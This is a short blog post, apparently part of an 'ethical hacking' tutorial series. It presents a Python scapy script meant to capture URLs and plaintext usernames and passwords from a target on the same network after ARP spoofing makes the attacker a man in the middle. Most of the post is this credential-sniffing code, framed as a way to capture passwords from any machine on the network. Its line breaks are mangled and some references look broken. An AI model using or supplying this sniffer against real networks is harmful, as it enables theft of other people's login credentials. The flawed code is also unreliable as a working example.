Python Ethical Hacking - Packet Sniffer(2)
2024-10-09 10:32:26
Capturing passwords from any computer connected to the same network.
ARP_SPOOF + PACKET_SNIFFER
- Target a computer on the same network.
- arp_spoof to redirect the flow of packets(become MITM)
- Packet_sniffer to see URLs, usernames, and passwords sent by the target.
#!/usr/bin/env python from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def get_url(packet):
return packet[HTTPRequest].Host.decode(errors='ignore') + packet[HTTPRequest].Path.decode(errors='ignore') def get_login_info(packet):
if packet.haslayer(scapy.all.Raw):
load = packet[scapy.all.Raw].load.decode(errors='ignore')
keywords = ["username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
return load def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >> " + url) login_info = get_login_info(packet)
if login_info:
print("\n\n[+] Possible username/password > " + login_info + "\n\n") sniff("eth0")
最新文章
- 在ubuntu 12.04 x64下编译hadoop2.4
- BP神经网络实现
- JavaScript基础--DOM对象加强篇(十四)
- C#通过安全证书生成签名和验签辅助类
- ibm硬件知识点
- asp.net导出Excel
- 列表checkbox全选
- swoole 弹幕系统
- mysql 打开慢查询日志
- 【CSS3】浏览器内核、私有前缀
- Java爬虫----有道翻译初步
- Linux知识积累(3)$()和${}和$(())和(())
- Spring Boot系列(二) Spring Boot 之 REST
- 【翻译】asp.net core中使用MediatR
- Web网站配置Gzip,压缩js css文件
- SQL 一列拆分多行
- width() 、 height() 方法;innerWidth() 、innerHeight() 方法;outerWidth() 、 outerHeight() 方法的区别
- shell - 常识
- 提交给mysql java驱动的优化下个版本要发布了^_^
- java Object解析
热门文章
- 02 . Ansible高级用法(运维开发篇)
- skynet 初步分析
- Eureka心跳健康检查机制和Spring boot admin 节点状态一直为DOWN的排查(忽略某一个节点的健康检查)
- JavaWeb网上图书商城完整项目--day02-3.regist页面输入框失去焦点进行校验
- java 中的 自定义viewUtils框架
- disruptor架构三 使用场景 使用WorkHandler和BatchEventProcessor辅助创建消费者
- 【MyBtis】获取数据插入postgresql后返回的自增id
- 二.httpRequest-httpResponse-JsonResponse对象
- python递归函数实现阶乘函数
- 分布式配置中心(Native - Config)